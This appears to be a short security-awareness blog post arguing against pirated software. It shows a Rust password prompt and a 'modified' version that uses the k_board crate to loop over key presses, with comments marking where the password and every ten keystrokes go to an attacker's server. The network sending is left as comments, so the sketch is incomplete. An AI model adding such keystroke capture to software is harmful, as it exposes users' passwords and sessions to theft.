How cybercriminals steal your passwords by listening to your keyboard 🕵️‍♀️ 💁‍♀️

#linux #programming #rust #security

Cybercriminals often don't have our passwords or tokens after a brute force decryption, but rather simply listen to our keyboard...

In this article, I'll show you how the use of pirated software can steal your passwords with just 10 additional lines of code for GNU/Linux systems.

Let's take a look at this Rust code:

use std::io::BufRead;

fn main() {
    println!("Enter your token to validate your identity:");
    let mut password: String = String::new();
    //we can hidden the input for more privacy
    let stdin: std::io::Stdin = std::io::stdin();
    stdin.lock().read_line(&mut password).unwrap();
    //send password with HTTPS
}

It is a standard function that retrieves a password and then sends it via HTTPS to a server. Without any alteration, this code is 100% secure.

Now, let's assume the user didn't download or compile an authentic version but instead downloaded a version modified by a cybercriminal. We can observe that by using a low-level keyboard handler, not only can they obtain the user's password, but they can also eavesdrop on the entire session.

I will use k_board for this.

cargo add k_board

Objectives:

Obtain password: Listen to the keyboard until an Enter key is pressed.
Session: Send what is typed to an HTTP server every 10 keystrokes.

use k_board::{Keyboard, Keys};
use std::io::BufRead;

fn main() {
    println!("Enter your token to validate your identity:");
    let mut password: String = String::new();
    let stdin: std::io::Stdin = std::io::stdin();
    stdin.lock().read_line(&mut password).unwrap();
    // -> send password to the original server
    // -> send password to our server
    // -> Inside logic program: look to every key event
    get_keys_pressed_and_send_it();
}

fn get_keys_pressed_and_send_it() {
    let mut i: u8 = 0;
    loop {
        let key = Keyboard::new().read_key();
        if key != Keys::Null {
            i += 1;
        }
        if i == 10 {
            //send to our server
            i = 0;
        }
    }
}

I am a little scared of what cybercriminals can do to me if I use modified software. Advocating for free software is not just about having things "free" in the economic sense of the word, but it is to prevent these kinds of everyday threats.

See you in the next article❣️🤗!!